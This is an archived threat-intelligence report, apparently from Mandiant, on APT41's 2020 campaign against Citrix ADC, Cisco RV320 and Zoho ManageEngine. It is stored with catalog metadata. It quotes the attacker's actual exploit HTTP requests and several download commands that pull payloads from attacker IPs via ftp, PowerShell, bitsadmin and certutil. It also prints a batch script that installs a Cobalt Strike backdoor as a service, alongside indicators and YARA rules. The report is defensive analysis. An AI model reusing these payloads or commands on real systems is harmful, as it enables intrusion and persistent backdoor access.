{ "id": "0841e372-7886-4596-951b-ed44cd071531", "created_at": "2026-04-06T00:15:11.909275Z", "updated_at": "2026-04-10T03:32:20.859208Z", "deleted_at": null, "sha1_hash": "39f4cb9983c03009b6c7199e164d992a0b1e0f1f", "title": "APT41 Initiates Intrusion Campaign Using Multiple Exploits", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 173624, "plain_text": "APT41 Initiates Intrusion Campaign Using Multiple Exploits\r\nBy Mandiant\r\nPublished: 2020-03-25 · Archived: 2026-04-05 17:28:50 UTC\r\nWritten by: Christopher Glyer, Dan Perez, Sarah Jones, Steve Miller\r\nBeginning this year, FireEye observed Chinese actor APT41 carry out one of the broadest campaigns by a Chinese\r\ncyber espionage actor we have observed in recent years. Between January 20 and March 11, FireEye observed\r\nAPT41 attempt to exploit vulnerabilities in Citrix NetScaler/ADC, Cisco routers, and Zoho ManageEngine\r\nDesktop Central at over 75 FireEye customers. Countries we’ve seen targeted include Australia, Canada,\r\nDenmark, Finland, France, India, Italy, Japan, Malaysia, Mexico, Philippines, Poland, Qatar, Saudi Arabia,\r\nSingapore, Sweden, Switzerland, UAE, UK and USA. The following industries were targeted: Banking/Finance,\r\nConstruction, Defense Industrial Base, Government, Healthcare, High Technology, Higher Education, Legal,\r\nManufacturing, Media, Non-profit, Oil \u0026 Gas, Petrochemical, Pharmaceutical, Real Estate, Telecommunications,\r\nTransportation, Travel, and Utility. It’s unclear if APT41 scanned the Internet and attempted exploitation en masse\r\nor selected a subset of specific organizations to target, but the victims appear to be more targeted in nature.\r\nExploitation of CVE-2019-19781 (Citrix Application Delivery Controller [ADC])\r\nStarting on January 20, 2020, APT41 used the IP address 66.42.98[.]220 to attempt exploits of Citrix Application\r\nDelivery Controller (ADC) and Citrix Gateway devices with CVE-2019-19781 (published December 17, 2019).\r\nFigure 1: Timeline of key events\r\nThe initial CVE-2019-19781 exploitation activity on January 20 and January 21, 2020, involved execution of the\r\ncommand ‘file /bin/pwd’, which may have achieved two objectives for APT41. First, it would confirm whether the\r\nsystem was vulnerable and the mitigation wasn’t applied. Second, it may return architecture-related information\r\nthat would be required knowledge for APT41 to successfully deploy a backdoor in a follow-up step.\r\nOne interesting thing to note is that all observed requests were only performed against Citrix devices, suggesting\r\nAPT41 was operating with an already-known list of identified devices accessible on the internet.\r\nhttps://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html\r\nPage 1 of 11\n\nPOST /vpns/portal/scripts/newbm.pl HTTP/1.1\r\nHost: [redacted]\r\nConnection: close\r\nAccept-Encoding: gzip, deflate\r\nAccept: */*\r\nUser-Agent: python-requests/2.22.0\r\nNSC_NONCE: nsroot\r\nNSC_USER: ../../../netscaler/portal/templates/[redacted]\r\nContent-Length: 96\r\nurl=http://example.com\u0026title=[redacted]\u0026desc=[% template.new('BLOCK' = 'print `file /bin/pwd`') %]\r\nFigure 2: Example APT41 HTTP traffic exploiting CVE-2019-19781\r\nThere is a lull in APT41 activity between January 23 and February 1, which is likely related to the Chinese Lunar\r\nNew Year holidays which occurred between January 24 and January 30, 2020. This has been a common activity\r\npattern by Chinese APT groups in past years as well.\r\nStarting on February 1, 2020, APT41 moved to using CVE-2019-19781 exploit payloads that initiate a download\r\nvia the File Transfer Protocol (FTP). Specifically, APT41 executed the command ‘/usr/bin/ftp -o /tmp/bsd\r\nftp://test:[redacted]\\@66.42.98[.]220/bsd’, which connected to 66.42.98[.]220 over the FTP protocol, logged in to\r\nthe FTP server with a username of ‘test’ and a password that we have redacted, and then downloaded an unknown\r\npayload named ‘bsd’ (which was likely a backdoor).\r\nPOST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1\r\nAccept-Encoding: identity\r\nContent-Length: 147\r\nConnection: close\r\nNsc_User: ../../../netscaler/portal/templates/[redacted]\r\nUser-Agent: Python-urllib/2.7\r\nNsc_Nonce: nsroot\r\nHost: [redacted]\r\nContent-Type: application/x-www-form-urlencoded\r\nurl=http://example.com\u0026title=[redacted]\u0026desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/bsd ftp://te\r\nFigure 3: Example APT41 HTTP traffic exploiting CVE-2019-19781\r\nWe did not observe APT41 activity at FireEye customers between February 2 and February 19, 2020. China\r\ninitiated COVID-19 related quarantines in cities in Hubei province starting on January 23 and January 24, and\r\nrolled out quarantines to additional provinces starting between February 2 and February 10. While it is possible\r\nthat this reduction in activity might be related to the COVID-19 quarantine measures in China, APT41 may have\r\nremained active in other ways, which we were unable to observe with FireEye telemetry. We observed a\r\nsignificant uptick in CVE-2019-19781 exploitation on February 24 and February 25. The exploit behavior was\r\nalmost identical to the activity on February 1, where only the name of the payload ‘un’ changed.\r\nhttps://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html\r\nPage 2 of 11\n\nPOST /vpn/../vpns/portal/scripts/newbm.pl HTTP/1.1\r\nAccept-Encoding: identity\r\nContent-Length: 145\r\nConnection: close\r\nNsc_User: ../../../netscaler/portal/templates/[redacted]\r\nUser-Agent: Python-urllib/2.7\r\nNsc_Nonce: nsroot\r\nHost: [redacted]\r\nContent-Type: application/x-www-form-urlencoded\r\nurl=http://example.com\u0026title= [redacted]\u0026desc=[% template.new('BLOCK' = 'print `/usr/bin/ftp -o /tmp/un ftp://te\r\nFigure 4: Example APT41 HTTP traffic exploiting CVE-2019-19781\r\nCitrix released a mitigation for CVE-2019-19781 on December 17, 2019, and as of January 24, 2020, released\r\npermanent fixes for all supported versions of Citrix ADC, Gateway, and SD-WAN WANOP.\r\nCisco Router Exploitation\r\nOn February 21, 2020, APT41 successfully exploited a Cisco RV320 router at a telecommunications organization\r\nand downloaded a 32-bit ELF binary payload compiled for a 64-bit MIPS processor named ‘fuc’ (MD5:\r\n155e98e5ca8d662fad7dc84187340cbc). It is unknown what specific exploit was used, but there is a Metasploit\r\nmodule that combines two CVE’s (CVE-2019-1653 and CVE-2019-1652) to enable remote code execution on\r\nCisco RV320 and RV325 small business routers and uses wget to download the specified payload.\r\nGET /test/fuc\r\nHTTP/1.1\r\nHost: 66.42.98\\.220\r\nUser-Agent: Wget\r\nConnection: close\r\nFigure 5: Example HTTP request showing Cisco RV320 router downloading a payload via wget\r\n66.42.98[.]220 also hosted a file name http://66.42.98[.]220/test/1.txt. The content of 1.txt (MD5:\r\nc0c467c8e9b2046d7053642cc9bdd57d) is ‘cat /etc/flash/etc/nk_sysconfig’, which is the command one would\r\nexecute on a Cisco RV320 router to display the current configuration.\r\nCisco PSIRT confirmed that fixed software to address the noted vulnerabilities is available and asks customers to\r\nreview the following security advisories and take appropriate action:\r\nCisco Small Business RV320 and RV325 Routers Information Disclosure Vulnerability\r\nCisco Small Business RV320 and RV325 Routers Command Injection Vulnerability\r\nExploitation of CVE-2020-10189 (Zoho ManageEngine Zero-Day Vulnerability)\r\nhttps://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html\r\nPage 3 of 11\n\nOn March 5, 2020, researcher Steven Seeley, published an advisory and released proof-of-concept code for a zero-day remote code execution vulnerability in Zoho ManageEngine Desktop Central versions prior to 10.0.474\r\n(CVE-2020-10189). Beginning on March 8, FireEye observed APT41 use 91.208.184[.]78 to attempt to exploit\r\nthe Zoho ManageEngine vulnerability at more than a dozen FireEye customers, which resulted in the compromise\r\nof at least five separate customers. FireEye observed two separate variations of how the payloads (install.bat and\r\nstoresyncsvc.dll) were deployed. In the first variation the CVE-2020-10189 exploit was used to directly upload\r\n“logger.zip”, a simple Java based program, which contained a set of commands to use PowerShell to download\r\nand execute install.bat and storesyncsvc.dll.\r\njava/lang/Runtime\r\ngetRuntime\r\n()Ljava/lang/Runtime;\r\nXcmd /c powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.42.98[.]220:12345/t\r\nWindows\\Temp\\install.bat')\u0026powershell $client = new-object System.Net.WebClient;$client.DownloadFile('http://66.\r\nC:\\Windows\\Temp\\storesyncsvc.dll')\u0026C:\\Windows\\Temp\\install.bat\r\n'(Ljava/lang/String;)Ljava/lang/Process;\r\nStackMapTable\r\nysoserial/Pwner76328858520609\r\nLysoserial/Pwner76328858520609;\r\nFigure 6: Contents of logger.zip\r\nHere we see a toolmark from the tool ysoserial that was used to create the payload in the POC. The string\r\nPwner76328858520609 is unique to the POC payload, indicating that APT41 likely used the POC as source\r\nmaterial in their operation.\r\nIn the second variation, FireEye observed APT41 leverage the Microsoft BITSAdmin command-line tool to\r\ndownload install.bat (MD5: 7966c2c546b71e800397a67f942858d0) from known APT41 infrastructure\r\n66.42.98[.]220 on port 12345.\r\nParent Process: C:\\ManageEngine\\DesktopCentral_Server\\jre\\bin\\java.exe\r\nProcess Arguments: cmd /c bitsadmin /transfer bbbb http://66.42.98[.]220:12345/test/install.bat C:\\Users\\Public\\\r\nFigure 7: Example FireEye Endpoint Security event depicting successful CVE-2020-10189 exploitation\r\nIn both variations, the install.bat batch file was used to install persistence for a trial-version of Cobalt Strike\r\nBEACON loader named storesyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f).\r\n@echo off\r\nset \"WORK_DIR=C:\\Windows\\System32\"\r\nset \"DLL_NAME=storesyncsvc.dll\"\r\nset \"SERVICE_NAME=StorSyncSvc\"\r\nset \"DISPLAY_NAME=Storage Sync Service\"\r\nset \"DESCRIPTION=The Storage Sync Service is the top-level resource for File Sync. It creates sync relationships\r\nhttps://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html\r\nPage 4 of 11\n\nsc stop %SERVICE_NAME%\r\nsc delete %SERVICE_NAME%\r\nmkdir %WORK_DIR%\r\ncopy \"%~dp0%DLL_NAME%\" \"%WORK_DIR%\" /Y\r\nreg add \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Svchost\" /v \"%SERVICE_NAME%\" /t REG_MULTI_SZ /d \"%SER\r\nsc create \"%SERVICE_NAME%\" binPath= \"%SystemRoot%\\system32\\svchost.exe -k %SERVICE_NAME%\" type= share start= aut\r\nSC failure \"%SERVICE_NAME%\" reset= 86400 actions= restart/60000/restart/60000/restart/60000\r\nsc description \"%SERVICE_NAME%\" \"%DESCRIPTION%\"\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\%SERVICE_NAME%\\Parameters\" /f\r\nreg add \"HKLM\\SYSTEM\\CurrentControlSet\\Services\\%SERVICE_NAME%\\Parameters\" /v \"ServiceDll\" /t REG_EXPAND_SZ /d \"\r\nnet start \"%SERVICE_NAME%\"\r\nFigure 8: Contents of install.bat\r\nStoresyncsvc.dll was a Cobalt Strike BEACON implant (trial-version) which connected to exchange.dumb1[.]com\r\n(with a DNS resolution of 74.82.201[.]8) using a jquery malleable command and control (C2) profile.\r\nGET /jquery-3.3.1.min.js HTTP/1.1\r\nHost: cdn.bootcss.com\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nReferer: http://cdn.bootcss.com/\r\nAccept-Encoding: gzip, deflate\r\nCookie: __cfduid=CdkIb8kXFOR_9Mn48DQwhIEuIEgn2VGDa_XZK_xAN47OjPNRMpJawYvnAhPJYM\r\nDA8y_rXEJQGZ6Xlkp_wCoqnImD-bj4DqdTNbj87Rl1kIvZbefE3nmNunlyMJZTrDZfu4EV6oxB8yKMJfLXydC5YF9OeZwqBSs3Tun12BVFWLI\r\nUser-Agent: Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko\r\nConnection: Keep-Alive Cache-Control: no-cache\r\nFigure 9: Example APT41 Cobalt Strike BEACON jquery malleable C2 profile HTTP request\r\nWithin a few hours of initial exploitation, APT41 used the storescyncsvc.dll BEACON backdoor to download a\r\nsecondary backdoor with a different C2 address that uses Microsoft CertUtil, a common TTP that we’ve observed\r\nAPT41 use in past intrusions, which they then used to download 2.exe (MD5:\r\n3e856162c36b532925c8226b4ed3481c). The file 2.exe was a VMProtected Meterpreter downloader used to\r\ndownload Cobalt Strike BEACON shellcode. The usage of VMProtected binaries is another very common TTP\r\nthat we’ve observed this group leverage in multiple intrusions in order to delay analysis of other tools in their\r\ntoolkit.\r\nGET /2.exe HTTP/1.1\r\nCache-Control: no-cache\r\nConnection: Keep-Alive\r\nPragma: no-cache\r\nAccept: */*\r\nUser-Agent: Microsoft-CryptoAPI/6.3\r\nHost: 91.208.184[.]78\r\nhttps://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html\r\nPage 5 of 11\n\nFigure 10: Example HTTP request downloading ‘2.exe’ VMProtected Meterpreter downloader via CertUtil\r\ncertutil -urlcache -split -f http://91.208.184[.]78/2.exe\r\nFigure 11: Example CertUtil command to download ‘2.exe’ VMProtected Meterpreter downloader\r\nThe Meterpreter downloader ‘TzGG’ was configured to communicate with 91.208.184[.]78 over port 443 to\r\ndownload the shellcode (MD5: 659bd19b562059f3f0cc978e15624fd9) for Cobalt Strike BEACON (trial-version).\r\nGET /TzGG HTTP/1.1\r\nUser-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0)\r\nHost: 91.208.184[.]78:443\r\nConnection: Keep-Alive\r\nCache-Control: no-cache\r\nFigure 12: Example HTTP request downloading ‘TzGG’ shellcode for Cobalt Strike BEACON\r\nThe downloaded BEACON shellcode connected to the same C2 server: 91.208.184[.]78. We believe this is an\r\nexample of the actor attempting to diversify post-exploitation access to the compromised systems.\r\nManageEngine released a short term mitigation for CVE-2020-10189 on January 20, 2020, and subsequently\r\nreleased an update on March 7, 2020, with a long term fix.\r\nOutlook\r\nThis activity is one of the most widespread campaigns we have seen from China-nexus espionage actors in recent\r\nyears. While APT41 has previously conducted activity with an extensive initial entry such as the trojanizing of\r\nNetSarang software, this scanning and exploitation has focused on a subset of our customers, and seems to reveal\r\na high operational tempo and wide collection requirements for APT41.\r\nIt is notable that we have only seen these exploitation attempts leverage publicly available malware such as Cobalt\r\nStrike and Meterpreter. While these backdoors are full featured, in previous incidents APT41 has waited to deploy\r\nmore advanced malware until they have fully understood where they were and carried out some initial\r\nreconnaissance. In 2020, APT41 continues to be one of the most prolific threats that FireEye currently tracks. This\r\nnew activity from this group shows how resourceful and how quickly they can leverage newly disclosed\r\nvulnerabilities to their advantage.\r\nPreviously, FireEye Mandiant Managed Defense identified APT41 successfully leverage CVE-2019-3396\r\n(Atlassian Confluence) against a U.S. based university. While APT41 is a unique state-sponsored Chinese threat\r\ngroup that conducts espionage, the actor also conducts financially motivated activity for personal gain.\r\nIndicators\r\nType Indicator(s)\r\nhttps://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html\r\nPage 6 of 11\n\nCVE-2019-19781\r\nExploitation (Citrix\r\nApplication Delivery\r\nControl)\r\n66.42.98[.]220\r\nCVE-2019-19781 exploitation attempts with a payload of ‘file /bin/pwd’\r\nCVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o\r\n/tmp/un ftp://test:[redacted]\\@66.42.98[.]220/bsd’\r\nCVE-2019-19781 exploitation attempts with a payload of ‘/usr/bin/ftp -o\r\n/tmp/un ftp://test:[redacted]\\@66.42.98[.]220/un’\r\n/tmp/bsd\r\n/tmp/un\r\nCisco Router Exploitation\r\n66.42.98\\.220\r\n‘1.txt’ (MD5: c0c467c8e9b2046d7053642cc9bdd57d)\r\n‘fuc’ (MD5: 155e98e5ca8d662fad7dc84187340cbc\r\nCVE-2020-10189 (Zoho\r\nManageEngine Desktop\r\nCentral)\r\n66.42.98[.]220\r\n91.208.184[.]78\r\n74.82.201[.]8\r\nexchange.dumb1[.]com\r\ninstall.bat (MD5: 7966c2c546b71e800397a67f942858d0)\r\nstoresyncsvc.dll (MD5: 5909983db4d9023e4098e56361c96a6f)\r\nC:\\Windows\\Temp\\storesyncsvc.dll\r\nC:\\Windows\\Temp\\install.bat\r\n2.exe (MD5: 3e856162c36b532925c8226b4ed3481c)\r\nC:\\Users\\[redacted]\\install.bat\r\nTzGG (MD5: 659bd19b562059f3f0cc978e15624fd9)\r\nC:\\ManageEngine\\DesktopCentral_Server\\jre\\bin\\java.exe spawning\r\ncmd.exe and/or bitsadmin.exe\r\nCertutil.exe downloading 2.exe and/or payloads from 91.208.184[.]78\r\nhttps://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html\r\nPage 7 of 11\n\nPowerShell downloading files with Net.WebClient\r\nDetecting the Techniques\r\nFireEye detects this activity across our platforms. This table contains several specific detection names from a\r\nlarger list of detections that were available prior to this activity occurring.\r\nPlatform Signature Name\r\nEndpoint Security\r\nBITSADMIN.EXE MULTISTAGE DOWNLOADER (METHODOLOGY)\r\nCERTUTIL.EXE DOWNLOADER A (UTILITY)\r\nGeneric.mg.5909983db4d9023e\r\nGeneric.mg.3e856162c36b5329\r\nPOWERSHELL DOWNLOADER (METHODOLOGY)\r\nSUSPICIOUS BITSADMIN USAGE B (METHODOLOGY)\r\nSAMWELL (BACKDOOR)\r\nSUSPICIOUS CODE EXECUTION FROM ZOHO MANAGE ENGINE (EXPLOIT)\r\nNetwork Security\r\nBackdoor.Meterpreter\r\nDTI.Callback\r\nExploit.CitrixNetScaler\r\nTrojan.METASTAGE\r\nExploit.ZohoManageEngine.CVE-2020-10198.Pwner\r\nExploit.ZohoManageEngine.CVE-2020-10198.mdmLogUploader\r\nHelix\r\nCITRIX ADC [Suspicious Commands]\r\nEXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Attempt]\r\nEXPLOIT - CITRIX ADC [CVE-2019-19781 Exploit Success]\r\nEXPLOIT - CITRIX ADC [CVE-2019-19781 Payload Access]\r\nEXPLOIT - CITRIX ADC [CVE-2019-19781 Scanning]\r\nMALWARE METHODOLOGY [Certutil User-Agent]\r\nWINDOWS METHODOLOGY [BITSadmin Transfer]\r\nWINDOWS METHODOLOGY [Certutil Downloader]\r\nhttps://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html\r\nPage 8 of 11\n\nMITRE ATT\u0026CK Technique Mapping\r\nATT\u0026CK Techniques\r\nInitial Access External Remote Services (T1133), Exploit Public-Facing Application (T1190)\r\nExecution PowerShell (T1086), Scripting (T1064)\r\nPersistence New Service (T1050)\r\nPrivilege\r\nEscalation\r\nExploitation for Privilege Escalation (T1068)\r\nDefense\r\nEvasion\r\nBITS Jobs (T1197), Process Injection (T1055)\r\nCommand And\r\nControl\r\nRemote File Copy (T1105), Commonly Used Port (T1436), Uncommonly Used Port\r\n(T1065), Custom Command and Control Protocol (T1094), Data Encoding (T1132),\r\nStandard Application Layer Protocol (T1071)\r\nAppendix A: Discovery Rules\r\nThe following Yara rules serve as examples of discovery rules for APT41 actor TTPs, turning the adversary\r\nmethods or tradecraft into new haystacks for purposes of detection or hunting. For all tradecraft-based discovery\r\nrules, we recommend deliberate testing and tuning prior to implementation in any production system. Some of\r\nthese rules are tailored to build concise haystacks that are easy to review for high-fidelity detections. Some of\r\nthese rules are broad in aperture that build larger haystacks for further automation or processing in threat hunting\r\nsystems.\r\nimport \"pe\"\r\nrule ExportEngine_APT41_Loader_String\r\n{\r\n meta:\r\n author = \"@stvemillertime\"\r\n description \"This looks for a common APT41 Export DLL name in BEACON shellcode loaders,\r\n strings:\r\n $pcre = /loader_[\\x00-\\x7F]{1,}\\x00/\r\n condition:\r\n uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset\r\n}\r\nrule ExportEngine_ShortName\r\n{\r\n meta:\r\n author = \"@stvemillertime\"\r\nhttps://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html\r\nPage 9 of 11\n\ndescription = \"This looks for Win PEs where Export DLL name is a single character\"\r\n strings:\r\n $pcre = /[A-Za-z0-9]{1}\\.(dll|exe|dat|bin|sys)/\r\n condition:\r\n uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.rva_t\r\n}\r\nrule ExportEngine_xArch\r\n{\r\n meta:\r\n author = \"@stvemillertime\"\r\n description = \"This looks for Win PEs where Export DLL name is a something like x32.dat\"\r\n strings:\r\n $pcre = /[\\x00-\\x7F]{1,}x(32|64|86)\\.dat\\x00/\r\n condition:\r\n uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $pcre at pe.rva_to_offset(uint32(pe.\r\n}\r\nrule RareEquities_LibTomCrypt\r\n{\r\n meta:\r\n author = \"@stvemillertime\"\r\n description = \"This looks for executables with strings from LibTomCrypt as seen by some APT41-esque acto\r\n strings:\r\n $a1 = \"LibTomMath\"\r\n condition:\r\n uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and $a1\r\n}\r\nrule RareEquities_KCP\r\n{\r\n meta:\r\n author = \"@stvemillertime\"\r\n description = \"This is a wide catchall rule looking for executables with equities for a transport librar\r\n strings:\r\n $a01 = \"[RO] %ld bytes\"\r\n $a02 = \"recv sn=%lu\"\r\n $a03 = \"[RI] %d bytes\"\r\n $a04 = \"input ack: sn=%lu rtt=%ld rto=%ld\"\r\n $a05 = \"input psh: sn=%lu ts=%lu\"\r\n $a06 = \"input probe\"\r\n $a07 = \"input wins: %lu\"\r\n $a08 = \"rcv_nxt=%lu\\\\n\"\r\n $a09 = \"snd(buf=%d, queue=%d)\\\\n\"\r\n $a10 = \"rcv(buf=%d, queue=%d)\\\\n\"\r\n $a11 = \"rcvbuf\"\r\n condition:\r\n (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550) and filesize \u003c 5MB and 3 of ($a*)\r\n}\r\nrule ConventionEngine_Term_Users\r\nhttps://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html\r\nPage 10 of 11\n\n{\r\n meta:\r\n author = \"@stvemillertime\"\r\n description = \"Searching for PE files with PDB path keywords, terms or anomalies.\"\r\n sample_md5 = \"09e4e6fa85b802c46bc121fcaecc5666\"\r\n ref_blog = \"https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-d\r\n strings:\r\n $pcre = /RSDS[\\x00-\\xFF]{20}[a-zA-Z]:\\\\[\\x00-\\xFF]{0,200}Users[\\x00-\\xFF]{0,200}\\.pdb\\x0\r\n condition:\r\n (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre\r\n}\r\nrule ConventionEngine_Term_Desktop\r\n{\r\n meta:\r\n author = \"@stvemillertime\"\r\n description = \"Searching for PE files with PDB path keywords, terms or anomalies.\"\r\n sample_md5 = \"71cdba3859ca8bd03c1e996a790c04f9\"\r\n ref_blog = \"https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-d\r\n strings:\r\n $pcre = /RSDS[\\x00-\\xFF]{20}[a-zA-Z]:\\\\[\\x00-\\xFF]{0,200}Desktop[\\x00-\\xFF]{0,200}\\.pdb\\\r\n condition:\r\n (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and $pcre\r\n}\r\nrule ConventionEngine_Anomaly_MultiPDB_Double\r\n{\r\n meta:\r\n author = \"@stvemillertime\"\r\n description = \"Searching for PE files with PDB path keywords, terms or anomalies.\"\r\n sample_md5 = \"013f3bde3f1022b6cf3f2e541d19353c\"\r\n ref_blog = \"https://www.fireeye.com/blog/threat-research/2019/08/definitive-dossier-of-d\r\n strings:\r\n $pcre = /RSDS[\\x00-\\xFF]{20}[a-zA-Z]:\\\\[\\x00-\\xFF]{0,200}\\.pdb\\x00/\r\n condition:\r\n (uint16(0) == 0x5A4D) and uint32(uint32(0x3C)) == 0x00004550 and #pcre == 2\r\n}\r\nPosted in\r\nThreat Intelligence\r\nSecurity \u0026 Identity\r\nSource: https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html\r\nhttps://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html\r\nPage 11 of 11", "extraction_quality": 1, "language": "EN", "sources": [ "ETDA", "Malpedia", "MITRE" ], "references": [ "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html" ], "report_names": [ "apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html" ], "threat_actors": [ { "id": "4d5f939b-aea9-4a0e-8bff-003079a261ea", "created_at": "2023-01-06T13:46:39.04841Z", "updated_at": "2026-04-10T02:00:03.196806Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "WICKED PANDA", "BRONZE EXPORT", "Brass Typhoon", "TG-2633", "Leopard Typhoon", "G0096", "Grayfly", "BARIUM", "BRONZE ATLAS", "Red Kelpie", "G0044", "Earth Baku", "TA415", "WICKED SPIDER", "HOODOO", "Winnti", "Double Dragon" ], "source_name": "MISPGALAXY:APT41", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "e698860d-57e8-4780-b7c3-41e5a8314ec0", "created_at": "2022-10-25T15:50:23.287929Z", "updated_at": "2026-04-10T02:00:05.329769Z", "deleted_at": null, "main_name": "APT41", "aliases": [ "APT41", "Wicked Panda", "Brass Typhoon", "BARIUM" ], "source_name": "MITRE:APT41", "tools": [ "ASPXSpy", "BITSAdmin", "PlugX", "Impacket", "gh0st RAT", "netstat", "PowerSploit", "ZxShell", "KEYPLUG", "LightSpy", "ipconfig", "sqlmap", "China Chopper", "ShadowPad", "MESSAGETAP", "Mimikatz", "certutil", "njRAT", "Cobalt Strike", "pwdump", "BLACKCOFFEE", "MOPSLED", "ROCKBOOT", "dsquery", "Winnti for Linux", "DUSTTRAP", "Derusbi", "ftp" ], "source_id": "MITRE", "reports": null }, { "id": "2a24d664-6a72-4b4c-9f54-1553b64c453c", "created_at": "2025-08-07T02:03:24.553048Z", "updated_at": "2026-04-10T02:00:03.787296Z", "deleted_at": null, "main_name": "BRONZE ATLAS", "aliases": [ "APT41 ", "BARIUM ", "Blackfly ", "Brass Typhoon", "CTG-2633", "Earth Baku ", "GREF", "Group 72 ", "Red Kelpie ", "TA415 ", "TG-2633 ", "Wicked Panda ", "Winnti" ], "source_name": "Secureworks:BRONZE ATLAS", "tools": [ "Acehash", "CCleaner v5.33 backdoor", "ChinaChopper", "Cobalt Strike", "DUSTPAN", "Dicey MSDN", "Dodgebox", "ForkPlayground", "HUC Proxy Malware (Htran)" ], "source_id": "Secureworks", "reports": null } ], "ts_created_at": 1775434511, "ts_updated_at": 1775791940, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/39f4cb9983c03009b6c7199e164d992a0b1e0f1f.pdf", "text": "https://archive.orkl.eu/39f4cb9983c03009b6c7199e164d992a0b1e0f1f.txt", "img": "https://archive.orkl.eu/39f4cb9983c03009b6c7199e164d992a0b1e0f1f.jpg" } }